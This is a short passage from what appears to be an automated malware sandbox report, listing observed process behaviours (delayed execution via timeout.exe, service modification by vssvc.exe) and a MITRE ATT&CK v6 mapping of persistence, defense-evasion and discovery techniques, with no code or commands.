4⤵
- Delays execution with timeout.exe
PID:2880

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2228

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery